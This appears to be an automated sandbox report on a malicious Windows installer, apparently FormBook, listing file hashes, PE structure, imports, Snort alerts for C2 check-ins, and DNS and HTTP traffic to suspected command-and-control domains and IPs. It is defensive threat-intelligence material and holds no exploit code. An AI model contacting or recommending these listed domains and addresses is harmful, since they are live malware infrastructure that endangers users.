                                              Reputation:low
                                              Preview: 0..c.K./|y.Su3U...O.......r)........b..,qLP..P4..K#8%.....(g.+...C.\......kL.V.../.4......p.{........<.J~....(..T.......[..LP..?."7.W.f.'...$...E.R...2]{[.i..A.6....$...#.iC.OU.Rq..n......~..c4.......N....1e..S..[..z..k.... j.Q.@..FR.'.a...w..0..r..I.K./|>.9. ...^YO.'......... ..Q..,qLP..P4..K#8%.....(>.+|.....SY..4.x._Gq....it. .>.:...p...s.P.ff4..U...7.N......[..w..:.h.v......N.bl.H..(FH>.0/$m....x..f...?.E.9...@OU.^@...`....F...c4........a...v.J.S..[..z..U... j..@.@.HFR...'.a._...0....I.K./|k.9....^YO.'.g.............b..,qLP..P4..K#8%.....(>.+|.....SY..4.x._Gq....it. .>.:...p...s.P.ff4..U...7.N......[..w..:.h.v......N.bl.H..(FH>.0/$m....x..f...?.E.#.iC.OU......^...N1...c4........a...1.J.S..[..z..U... j..@.@.HFR...'.a._...0....I.K./|k.9....^YO.'.g.............b..,qLP..P4..K#8%.....(>.+|.....SY..4.x._Gq....it. .>.:...p...s.P.ff4..U...7.N......[..w..:.h.v......N.bl.H..(FH>.0/$m....x..f...?.E.#.iC.OU......^...N1...c4........a...1.J.S..[..z..U... j
                                              C:\Users\user\AppData\Local\Temp\nshA78C.tmp\wdtzbwxasut.dll
                                              Process:C:\Users\user\Desktop\TT COPY_02101011.exe
                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                              Category:dropped
                                              Size (bytes):119296
                                              Entropy (8bit):6.288224575764392
                                              Encrypted:false
                                              SSDEEP:1536:oEQbLaInqrSaynnz92zu5Q8cnsu0azuIC9ry1VAqKjMoZfSVgHJsWjcdOeJ:mnOSFpl4u9jqwQV02OeJ
                                              MD5:54C860C5CD0476D353802753C7BBFB06
                                              SHA1:F3FAC4C8E96CBB528944FE76C7F74FDA8171A597
                                              SHA-256:19FBFDB247A76A54351902926C309FD6D3E7BE25C6DCA0062FC781215680913E
                                              SHA-512:83DD85D9A54A1FA688C7776A15E48D70B8EC12ED789F4AC2054FA3AFFAED3FDAA375A5BD3D542C7B1831810A4825EE518A14F2390C50BFB65D9B774BCEB6B183
                                              Malicious:true
                                              Antivirus:
                                              • Antivirus: Joe Sandbox ML, Detection: 100%
                                              • Antivirus: ReversingLabs, Detection: 16%
                                              Reputation:low
                                              Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........w...w...w....G..w...%a..w...%_..w...%`..w.......w.......w.......w...w...w...)...w...)...w...)...w...)...w..Rich.w..........PE..L.....a...........!.....j...d............................................... ......................................@...H...........................................P...............................p...@............................................text....h.......j.................. ..`.bss....D................................rdata...K.......L...n..............@..@.data...............................@....rsrc...............................@..@........................................................................................................................................................................................................................................................................................................

                                              Static File Info

                                              General

                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                              Entropy (8bit):7.93374011532904
                                              TrID:
                                              • Win32 Executable (generic) a (10002005/4) 92.16%
                                              • NSIS - Nullsoft Scriptable Install System (846627/2) 7.80%
                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                              • DOS Executable Generic (2002/1) 0.02%
                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                              File name:TT COPY_02101011.exe
                                              File size:309491
                                              MD5:ebabc0d66a9e01cc0926f3b311feff5f
                                              SHA1:83a44664135a7255045becde754dae29be496c8f
                                              SHA256:ea8733d0ea6248e2f522487d09e7854230a648e67f1a5e90fea31f6305a1ff7b
                                              SHA512:b9f9c3ec7080bf31e0ab43b68f8183d75a59ae262e7320e846883f7ec91695e5e01d70432a163252712fc7bdb6e27b6e5fb6b5589e31eb8779f3b2b5586eeeeb
                                              SSDEEP:6144:rGidvqI+0kw8220eOw980S46r8T+1T5VM8vs+u/E4+jfQaVz6142k+QF:Zd+nzbOw9l6r8Ts5sysax6142xk
                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........uJ...$...$...$./.{...$...%.:.$.".y...$..7....$.f."...$.Rich..$.................PE..L......H.................\...........0.....

                                              File Icon

                                              Icon Hash:b2a88c96b2ca6a72

                                              Static PE Info

                                              General

                                              Entrypoint:0x4030e3
                                              Entrypoint Section:.text
                                              Digitally signed:false
                                              Imagebase:0x400000
                                              Subsystem:windows gui
                                              Image File Characteristics:LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                              DLL Characteristics:
                                              Time Stamp:0x48EFCDCD [Fri Oct 10 21:49:01 2008 UTC]
                                              TLS Callbacks:
                                              CLR (.Net) Version:
                                              OS Version Major:4
                                              OS Version Minor:0
                                              File Version Major:4
                                              File Version Minor:0
                                              Subsystem Version Major:4
                                              Subsystem Version Minor:0
                                              Import Hash:7fa974366048f9c551ef45714595665e

                                              Entrypoint Preview

                                              Instruction
                                              sub esp, 00000180h
                                              push ebx
                                              push ebp
                                              push esi
                                              xor ebx, ebx
                                              push edi
                                              mov dword ptr [esp+18h], ebx
                                              mov dword ptr [esp+10h], 00409158h
                                              xor esi, esi
                                              mov byte ptr [esp+14h], 00000020h
                                              call dword ptr [00407030h]
                                              push 00008001h
                                              call dword ptr [004070B0h]
                                              push ebx
                                              call dword ptr [0040727Ch]
                                              push 00000008h
                                              mov dword ptr [0042EC18h], eax
                                              call 00007F80707D36A8h
                                              mov dword ptr [0042EB64h], eax
                                              push ebx
                                              lea eax, dword ptr [esp+34h]
                                              push 00000160h
                                              push eax
                                              push ebx
                                              push 00428F90h
                                              call dword ptr [00407158h]
                                              push 0040914Ch
                                              push 0042E360h
                                              call 00007F80707D335Fh
                                              call dword ptr [004070ACh]
                                              mov edi, 00434000h
                                              push eax
                                              push edi
                                              call 00007F80707D334Dh
                                              push ebx
                                              call dword ptr [0040710Ch]
                                              cmp byte ptr [00434000h], 00000022h
                                              mov dword ptr [0042EB60h], eax
                                              mov eax, edi
                                              jne 00007F80707D0B8Ch
                                              mov byte ptr [esp+14h], 00000022h
                                              mov eax, 00434001h
                                              push dword ptr [esp+14h]
                                              push eax
                                              call 00007F80707D2E40h
                                              push eax
                                              call dword ptr [0040721Ch]
                                              mov dword ptr [esp+1Ch], eax
                                              jmp 00007F80707D0BE5h
                                              cmp cl, 00000020h
                                              jne 00007F80707D0B88h
                                              inc eax
                                              cmp byte ptr [eax], 00000020h
                                              je 00007F80707D0B7Ch
                                              cmp byte ptr [eax], 00000022h
                                              mov byte ptr [eax+eax+00h], 00000000h

                                              Rich Headers

                                              Programming Language:
                                              • [EXP] VC++ 6.0 SP5 build 8804

                                              Data Directories

                                              NameVirtual AddressVirtual Size Is in Section
                                              IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IMPORT0x74b00xb4.rdata
                                              IMAGE_DIRECTORY_ENTRY_RESOURCE0x370000x900.rsrc
                                              IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                              IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                              IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                              IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                              IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_IAT0x70000x28c.rdata
                                              IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                              IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                              IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                              Sections

                                              NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                              .text0x10000x5b680x5c00False0.67722486413data6.48746502716IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                              .rdata0x70000x129c0x1400False0.4337890625data5.04904254867IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .data0x90000x25c580x400False0.58203125data4.76995537906IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                              .ndata0x2f0000x80000x0False0empty0.0IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                              .rsrc0x370000x9000xa00False0.4078125data3.93441125971IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                              Resources

                                              NameRVASizeTypeLanguageCountry
                                              RT_ICON0x371900x2e8dataEnglishUnited States
                                              RT_DIALOG0x374780x100dataEnglishUnited States
                                              RT_DIALOG0x375780x11cdataEnglishUnited States
                                              RT_DIALOG0x376980x60dataEnglishUnited States
                                              RT_GROUP_ICON0x376f80x14dataEnglishUnited States
                                              RT_MANIFEST0x377100x1ebXML 1.0 document, ASCII text, with very long lines, with no line terminatorsEnglishUnited States

                                              Imports

                                              DLLImport
                                              KERNEL32.dllCompareFileTime, SearchPathA, GetShortPathNameA, GetFullPathNameA, MoveFileA, SetCurrentDirectoryA, GetFileAttributesA, GetLastError, CreateDirectoryA, SetFileAttributesA, Sleep, GetTickCount, GetFileSize, GetModuleFileNameA, GetCurrentProcess, CopyFileA, ExitProcess, GetWindowsDirectoryA, SetFileTime, GetCommandLineA, SetErrorMode, LoadLibraryA, lstrcpynA, GetDiskFreeSpaceA, GlobalUnlock, GlobalLock, CreateThread, CreateProcessA, RemoveDirectoryA, CreateFileA, GetTempFileNameA, lstrlenA, lstrcatA, GetSystemDirectoryA, GetVersion, CloseHandle, lstrcmpiA, lstrcmpA, ExpandEnvironmentStringsA, GlobalFree, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GetModuleHandleA, LoadLibraryExA, GetProcAddress, FreeLibrary, MultiByteToWideChar, WritePrivateProfileStringA, GetPrivateProfileStringA, WriteFile, ReadFile, MulDiv, SetFilePointer, FindClose, FindNextFileA, FindFirstFileA, DeleteFileA, GetTempPathA
                                              USER32.dllEndDialog, ScreenToClient, GetWindowRect, EnableMenuItem, GetSystemMenu, SetClassLongA, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongA, SetCursor, LoadCursorA, CheckDlgButton, GetMessagePos, LoadBitmapA, CallWindowProcA, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, RegisterClassA, TrackPopupMenu, AppendMenuA, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextA, GetDlgItemTextA, MessageBoxIndirectA, CharPrevA, DispatchMessageA, PeekMessageA, DestroyWindow, CreateDialogParamA, SetTimer, SetWindowTextA, PostQuitMessage, SetForegroundWindow, wsprintfA, SendMessageTimeoutA, FindWindowExA, SystemParametersInfoA, CreateWindowExA, GetClassInfoA, DialogBoxParamA, CharNextA, OpenClipboard, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongA, LoadImageA, GetDC, EnableWindow, InvalidateRect, SendMessageA, DefWindowProcA, BeginPaint, GetClientRect, FillRect, DrawTextA, EndPaint, ShowWindow
                                              GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectA, SetBkMode, SetTextColor, SelectObject
                                              SHELL32.dllSHGetPathFromIDListA, SHBrowseForFolderA, SHGetFileInfoA, ShellExecuteA, SHFileOperationA, SHGetSpecialFolderLocation
                                              ADVAPI32.dllRegQueryValueExA, RegSetValueExA, RegEnumKeyA, RegEnumValueA, RegOpenKeyExA, RegDeleteKeyA, RegDeleteValueA, RegCloseKey, RegCreateKeyExA
                                              COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                              ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                              VERSION.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA

                                              Possible Origin

                                              Language of compilation systemCountry where language is spokenMap
                                              EnglishUnited States

                                              Network Behavior

                                              Snort IDS Alerts

                                              TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                              11/25/21-17:50:07.050486TCP1201ATTACK-RESPONSES 403 Forbidden804982037.123.118.150192.168.2.4
                                              11/25/21-17:50:17.640515TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982480192.168.2.4143.95.80.65
                                              11/25/21-17:50:17.640515TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982480192.168.2.4143.95.80.65
                                              11/25/21-17:50:17.640515TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982480192.168.2.4143.95.80.65
                                              11/25/21-17:50:56.215134TCP2031453ET TROJAN FormBook CnC Checkin (GET)4985080192.168.2.4104.21.31.204
                                              11/25/21-17:50:56.215134TCP2031449ET TROJAN FormBook CnC Checkin (GET)4985080192.168.2.4104.21.31.204
                                              11/25/21-17:50:56.215134TCP2031412ET TROJAN FormBook CnC Checkin (GET)4985080192.168.2.4104.21.31.204

                                              Network Port Distribution

                                              TCP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2021 17:49:40.649804115 CET4978180192.168.2.43.96.23.237
                                              Nov 25, 2021 17:49:40.756318092 CET80497813.96.23.237192.168.2.4
                                              Nov 25, 2021 17:49:40.756525993 CET4978180192.168.2.43.96.23.237
                                              Nov 25, 2021 17:49:40.756764889 CET4978180192.168.2.43.96.23.237
                                              Nov 25, 2021 17:49:40.862729073 CET80497813.96.23.237192.168.2.4
                                              Nov 25, 2021 17:49:40.862773895 CET80497813.96.23.237192.168.2.4
                                              Nov 25, 2021 17:49:40.862920046 CET4978180192.168.2.43.96.23.237
                                              Nov 25, 2021 17:49:40.863126040 CET4978180192.168.2.43.96.23.237
                                              Nov 25, 2021 17:49:40.969424963 CET80497813.96.23.237192.168.2.4
                                              Nov 25, 2021 17:49:45.932276011 CET4978380192.168.2.4172.67.158.42
                                              Nov 25, 2021 17:49:45.949707985 CET8049783172.67.158.42192.168.2.4
                                              Nov 25, 2021 17:49:45.949867964 CET4978380192.168.2.4172.67.158.42
                                              Nov 25, 2021 17:49:45.949994087 CET4978380192.168.2.4172.67.158.42
                                              Nov 25, 2021 17:49:45.967196941 CET8049783172.67.158.42192.168.2.4
                                              Nov 25, 2021 17:49:45.980499029 CET8049783172.67.158.42192.168.2.4
                                              Nov 25, 2021 17:49:45.980601072 CET8049783172.67.158.42192.168.2.4
                                              Nov 25, 2021 17:49:45.980667114 CET4978380192.168.2.4172.67.158.42
                                              Nov 25, 2021 17:49:45.980726004 CET4978380192.168.2.4172.67.158.42
                                              Nov 25, 2021 17:49:45.998821020 CET8049783172.67.158.42192.168.2.4
                                              Nov 25, 2021 17:49:51.092364073 CET4978480192.168.2.4213.186.33.5
                                              Nov 25, 2021 17:49:51.118983030 CET8049784213.186.33.5192.168.2.4
                                              Nov 25, 2021 17:49:51.119358063 CET4978480192.168.2.4213.186.33.5
                                              Nov 25, 2021 17:49:51.119391918 CET4978480192.168.2.4213.186.33.5
                                              Nov 25, 2021 17:49:51.146656990 CET8049784213.186.33.5192.168.2.4
                                              Nov 25, 2021 17:49:51.146681070 CET8049784213.186.33.5192.168.2.4
                                              Nov 25, 2021 17:49:51.147888899 CET4978480192.168.2.4213.186.33.5
                                              Nov 25, 2021 17:49:51.147927046 CET4978480192.168.2.4213.186.33.5
                                              Nov 25, 2021 17:49:51.174853086 CET8049784213.186.33.5192.168.2.4
                                              Nov 25, 2021 17:49:56.373147011 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.399692059 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.399797916 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.399925947 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.426296949 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.444983959 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445044041 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445082903 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445122004 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445161104 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.445163012 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445192099 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.445202112 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445242882 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445247889 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.445282936 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445322037 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445327997 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.445342064 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.445358992 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.445362091 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445394993 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.445455074 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.446290970 CET8049785151.139.128.11192.168.2.4
                                              Nov 25, 2021 17:49:56.446326017 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:49:56.446348906 CET4978580192.168.2.4151.139.128.11
                                              Nov 25, 2021 17:50:01.582222939 CET4979880192.168.2.4198.54.125.56
                                              Nov 25, 2021 17:50:01.748457909 CET8049798198.54.125.56192.168.2.4
                                              Nov 25, 2021 17:50:01.748611927 CET4979880192.168.2.4198.54.125.56
                                              Nov 25, 2021 17:50:01.748836994 CET4979880192.168.2.4198.54.125.56
                                              Nov 25, 2021 17:50:01.915517092 CET8049798198.54.125.56192.168.2.4
                                              Nov 25, 2021 17:50:01.915540934 CET8049798198.54.125.56192.168.2.4
                                              Nov 25, 2021 17:50:01.915874958 CET4979880192.168.2.4198.54.125.56
                                              Nov 25, 2021 17:50:01.915910006 CET4979880192.168.2.4198.54.125.56
                                              Nov 25, 2021 17:50:02.081880093 CET8049798198.54.125.56192.168.2.4
                                              Nov 25, 2021 17:50:06.990891933 CET4982080192.168.2.437.123.118.150
                                              Nov 25, 2021 17:50:07.020564079 CET804982037.123.118.150192.168.2.4
                                              Nov 25, 2021 17:50:07.020719051 CET4982080192.168.2.437.123.118.150
                                              Nov 25, 2021 17:50:07.020860910 CET4982080192.168.2.437.123.118.150
                                              Nov 25, 2021 17:50:07.050319910 CET804982037.123.118.150192.168.2.4
                                              Nov 25, 2021 17:50:07.050486088 CET804982037.123.118.150192.168.2.4
                                              Nov 25, 2021 17:50:07.050507069 CET804982037.123.118.150192.168.2.4
                                              Nov 25, 2021 17:50:07.050673962 CET4982080192.168.2.437.123.118.150
                                              Nov 25, 2021 17:50:07.050757885 CET4982080192.168.2.437.123.118.150
                                              Nov 25, 2021 17:50:07.080266953 CET804982037.123.118.150192.168.2.4
                                              Nov 25, 2021 17:50:17.491674900 CET4982480192.168.2.4143.95.80.65
                                              Nov 25, 2021 17:50:17.640175104 CET8049824143.95.80.65192.168.2.4
                                              Nov 25, 2021 17:50:17.640367031 CET4982480192.168.2.4143.95.80.65
                                              Nov 25, 2021 17:50:17.640515089 CET4982480192.168.2.4143.95.80.65
                                              Nov 25, 2021 17:50:17.788731098 CET8049824143.95.80.65192.168.2.4
                                              Nov 25, 2021 17:50:17.792484999 CET8049824143.95.80.65192.168.2.4
                                              Nov 25, 2021 17:50:17.792517900 CET8049824143.95.80.65192.168.2.4
                                              Nov 25, 2021 17:50:17.792548895 CET8049824143.95.80.65192.168.2.4
                                              Nov 25, 2021 17:50:17.792577982 CET8049824143.95.80.65192.168.2.4
                                              Nov 25, 2021 17:50:17.792601109 CET8049824143.95.80.65192.168.2.4
                                              Nov 25, 2021 17:50:17.792625904 CET8049824143.95.80.65192.168.2.4
                                              Nov 25, 2021 17:50:17.792648077 CET8049824143.95.80.65192.168.2.4
                                              Nov 25, 2021 17:50:17.792690992 CET4982480192.168.2.4143.95.80.65
                                              Nov 25, 2021 17:50:17.792787075 CET4982480192.168.2.4143.95.80.65
                                              Nov 25, 2021 17:50:17.792887926 CET4982480192.168.2.4143.95.80.65
                                              Nov 25, 2021 17:50:17.941077948 CET8049824143.95.80.65192.168.2.4
                                              Nov 25, 2021 17:50:22.868494987 CET4983380192.168.2.4185.65.236.168
                                              Nov 25, 2021 17:50:25.873550892 CET4983380192.168.2.4185.65.236.168
                                              Nov 25, 2021 17:50:31.890017033 CET4983380192.168.2.4185.65.236.168
                                              Nov 25, 2021 17:50:44.637453079 CET4984880192.168.2.4185.65.236.168
                                              Nov 25, 2021 17:50:47.641164064 CET4984880192.168.2.4185.65.236.168
                                              Nov 25, 2021 17:50:53.657629013 CET4984880192.168.2.4185.65.236.168

                                              UDP Packets

                                              TimestampSource PortDest PortSource IPDest IP
                                              Nov 25, 2021 17:49:30.427966118 CET5585453192.168.2.48.8.8.8
                                              Nov 25, 2021 17:49:30.530443907 CET53558548.8.8.8192.168.2.4
                                              Nov 25, 2021 17:49:40.561280966 CET6315353192.168.2.48.8.8.8
                                              Nov 25, 2021 17:49:40.645955086 CET53631538.8.8.8192.168.2.4
                                              Nov 25, 2021 17:49:45.893459082 CET5299153192.168.2.48.8.8.8
                                              Nov 25, 2021 17:49:45.931274891 CET53529918.8.8.8192.168.2.4
                                              Nov 25, 2021 17:49:50.999294996 CET5370053192.168.2.48.8.8.8
                                              Nov 25, 2021 17:49:51.086345911 CET53537008.8.8.8192.168.2.4
                                              Nov 25, 2021 17:49:56.159490108 CET5172653192.168.2.48.8.8.8
                                              Nov 25, 2021 17:49:56.369827032 CET53517268.8.8.8192.168.2.4
                                              Nov 25, 2021 17:50:01.505476952 CET6480153192.168.2.48.8.8.8
                                              Nov 25, 2021 17:50:01.580594063 CET53648018.8.8.8192.168.2.4
                                              Nov 25, 2021 17:50:06.924803972 CET6152253192.168.2.48.8.8.8
                                              Nov 25, 2021 17:50:06.989542961 CET53615228.8.8.8192.168.2.4
                                              Nov 25, 2021 17:50:17.329592943 CET5233753192.168.2.48.8.8.8
                                              Nov 25, 2021 17:50:17.490470886 CET53523378.8.8.8192.168.2.4
                                              Nov 25, 2021 17:50:22.799395084 CET5504653192.168.2.48.8.8.8
                                              Nov 25, 2021 17:50:22.867161989 CET53550468.8.8.8192.168.2.4
                                              Nov 25, 2021 17:50:44.591826916 CET4961253192.168.2.48.8.8.8
                                              Nov 25, 2021 17:50:44.630163908 CET53496128.8.8.8192.168.2.4
                                              Nov 25, 2021 17:50:48.923758030 CET4928553192.168.2.48.8.8.8
                                              Nov 25, 2021 17:50:49.302557945 CET53492858.8.8.8192.168.2.4
                                              Nov 25, 2021 17:50:56.143178940 CET5060153192.168.2.48.8.8.8
                                              Nov 25, 2021 17:50:56.192150116 CET53506018.8.8.8192.168.2.4
                                              Nov 25, 2021 17:51:01.299563885 CET6087553192.168.2.48.8.8.8
                                              Nov 25, 2021 17:51:01.443115950 CET53608758.8.8.8192.168.2.4

                                              DNS Queries

                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                              Nov 25, 2021 17:49:30.427966118 CET192.168.2.48.8.8.80x6f8eStandard query (0)www.mcclureic.xyzA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:49:40.561280966 CET192.168.2.48.8.8.80xe637Standard query (0)www.yesrecompensas.latA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:49:45.893459082 CET192.168.2.48.8.8.80x968aStandard query (0)www.gadget198.xyzA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:49:50.999294996 CET192.168.2.48.8.8.80x550fStandard query (0)www.le-hameau-enchanteur.comA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:49:56.159490108 CET192.168.2.48.8.8.80x12e7Standard query (0)www.henleygirlscricket.comA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:01.505476952 CET192.168.2.48.8.8.80x8c70Standard query (0)www.webartsolution.netA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:06.924803972 CET192.168.2.48.8.8.80xe4c9Standard query (0)www.blttsperma.questA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:17.329592943 CET192.168.2.48.8.8.80x8757Standard query (0)www.intelldat.comA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:22.799395084 CET192.168.2.48.8.8.80x8462Standard query (0)www.helpfromjames.comA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:44.591826916 CET192.168.2.48.8.8.80xff5eStandard query (0)www.helpfromjames.comA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:48.923758030 CET192.168.2.48.8.8.80xa78cStandard query (0)www.dandftrading.comA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:56.143178940 CET192.168.2.48.8.8.80xb4d0Standard query (0)www.bestinvest-4-you.comA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:51:01.299563885 CET192.168.2.48.8.8.80x51f4Standard query (0)www.weprepareamerica-planet.comA (IP address)IN (0x0001)

                                              DNS Answers

                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                              Nov 25, 2021 17:49:30.530443907 CET8.8.8.8192.168.2.40x6f8eServer failure (2)www.mcclureic.xyznonenoneA (IP address)IN (0x0001)
                                              Nov 25, 2021 17:49:40.645955086 CET8.8.8.8192.168.2.40xe637No error (0)www.yesrecompensas.lat3.96.23.237A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:49:45.931274891 CET8.8.8.8192.168.2.40x968aNo error (0)www.gadget198.xyz172.67.158.42A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:49:45.931274891 CET8.8.8.8192.168.2.40x968aNo error (0)www.gadget198.xyz104.21.8.250A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:49:51.086345911 CET8.8.8.8192.168.2.40x550fNo error (0)www.le-hameau-enchanteur.com213.186.33.5A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:49:56.369827032 CET8.8.8.8192.168.2.40x12e7No error (0)www.henleygirlscricket.comw2y6q8s9.stackpathcdn.comCNAME (Canonical name)IN (0x0001)
                                              Nov 25, 2021 17:49:56.369827032 CET8.8.8.8192.168.2.40x12e7No error (0)w2y6q8s9.stackpathcdn.com151.139.128.11A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:01.580594063 CET8.8.8.8192.168.2.40x8c70No error (0)www.webartsolution.netwebartsolution.netCNAME (Canonical name)IN (0x0001)
                                              Nov 25, 2021 17:50:01.580594063 CET8.8.8.8192.168.2.40x8c70No error (0)webartsolution.net198.54.125.56A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:06.989542961 CET8.8.8.8192.168.2.40xe4c9No error (0)www.blttsperma.quest37.123.118.150A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:17.490470886 CET8.8.8.8192.168.2.40x8757No error (0)www.intelldat.comintelldat.comCNAME (Canonical name)IN (0x0001)
                                              Nov 25, 2021 17:50:17.490470886 CET8.8.8.8192.168.2.40x8757No error (0)intelldat.com143.95.80.65A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:22.867161989 CET8.8.8.8192.168.2.40x8462No error (0)www.helpfromjames.comhelpfromjames.comCNAME (Canonical name)IN (0x0001)
                                              Nov 25, 2021 17:50:22.867161989 CET8.8.8.8192.168.2.40x8462No error (0)helpfromjames.com185.65.236.168A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:44.630163908 CET8.8.8.8192.168.2.40xff5eNo error (0)www.helpfromjames.comhelpfromjames.comCNAME (Canonical name)IN (0x0001)
                                              Nov 25, 2021 17:50:44.630163908 CET8.8.8.8192.168.2.40xff5eNo error (0)helpfromjames.com185.65.236.168A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:49.302557945 CET8.8.8.8192.168.2.40xa78cNo error (0)www.dandftrading.comwss.easycompanies.com.auCNAME (Canonical name)IN (0x0001)
                                              Nov 25, 2021 17:50:49.302557945 CET8.8.8.8192.168.2.40xa78cNo error (0)wss.easycompanies.com.au13.210.99.21A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:56.192150116 CET8.8.8.8192.168.2.40xb4d0No error (0)www.bestinvest-4-you.com104.21.31.204A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:50:56.192150116 CET8.8.8.8192.168.2.40xb4d0No error (0)www.bestinvest-4-you.com172.67.179.242A (IP address)IN (0x0001)
                                              Nov 25, 2021 17:51:01.443115950 CET8.8.8.8192.168.2.40x51f4No error (0)www.weprepareamerica-planet.com208.91.197.27A (IP address)IN (0x0001)

                                              HTTP Request Dependency Graph

                                              • www.yesrecompensas.lat
                                              • www.gadget198.xyz
                                              • www.le-hameau-enchanteur.com
                                              • www.henleygirlscricket.com
                                              • www.webartsolution.net
                                              • www.blttsperma.quest
                                              • www.intelldat.com

                                              HTTP Packets

                                              Session IDSource IPSource PortDestination IPDestination PortProcess
                                              0192.168.2.4497813.96.23.23780C:\Windows\explorer.exe
                                              TimestampkBytes transferredDirectionData
